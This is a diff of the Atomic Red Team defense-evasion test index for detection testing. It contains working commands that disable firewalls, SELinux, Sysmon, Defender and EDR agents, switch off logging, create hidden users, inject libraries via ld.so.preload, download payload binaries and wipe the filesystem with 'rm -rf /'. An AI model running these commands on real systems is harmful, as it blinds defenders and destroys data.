#{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} - ' +' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} - ' +' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) - ' +' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} - ' +' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1578.003: @@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present - ' +' prereq_command: 'which python3 - ' +' get_prereq_command: 'echo "Please install Python 3" - ' +' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present - ' +' prereq_command: 'which perl - ' +' get_prereq_command: 'echo "Please install Perl" - ' +' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present - ' +' prereq_command: 'which xxd - ' +' get_prereq_command: 'echo "Please install xxd" - ' +' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail - ' +' supported_platforms: - iaas:aws input_arguments: @@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false - ' +' cleanup_command: 'wevtutil sl "#{log_name}" /e:true - ' +' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off - ' +' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 - ' +' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f - ' +' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 - ' +' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw disable - ' +' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'systemctl stop ufw - ' +' cleanup_command: | systemctl start ufw systemctl status ufw @@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw logging off - ' +' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules - ' +' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. - ' +' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw - ' +' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. - ' +' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log - ' +' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection - ' +' supported_platforms: - linux input_arguments: @@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: command: 'setenforce 0 - ' +' cleanup_command: 'setenforce 1 - ' +' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux - ' +' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: @@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper - ' +' supported_platforms: - macos executor: command: 'sudo spctl --master-disable - ' +' cleanup_command: 'sudo spctl --master-enable - ' +' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS - ' +' supported_platforms: - macos input_arguments: @@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded - ' +' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed - ' +' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded - ' +' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available - ' +' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed - ' +' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} - ' +' get_prereq_command: 'cmd /c sysmon -i -accepteula - ' +' executor: command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null - ' +' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. - ' +' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. - ' +' supported_platforms: - windows input_arguments: @@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. - ' +' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed - ' +' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} - ' +' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} - ' +' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: @@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} - ' +' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} - ' +' executor: command: 'del /f #{file_to_delete} - ' +' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'mkdir #{folder_to_delete} - ' +' executor: command: 'rmdir /s /q #{folder_to_delete} - ' +' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null - ' +' executor: command: 'Remove-Item -path #{file_to_delete} - ' +' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null - ' +' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' +' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) - ' +' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null - ' +' executor: command: 'Remove-Item #{teamviewer_log_file} - ' +' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: @@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} - ' +' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +s #{file_to_modify} - ' +' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +h #{file_to_modify} - ' +' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #{filename} - ' +' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt - ' +' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) - ' +' supported_platforms: - macos input_arguments: @@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin - ' +' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} - ' +' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore - ' +' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 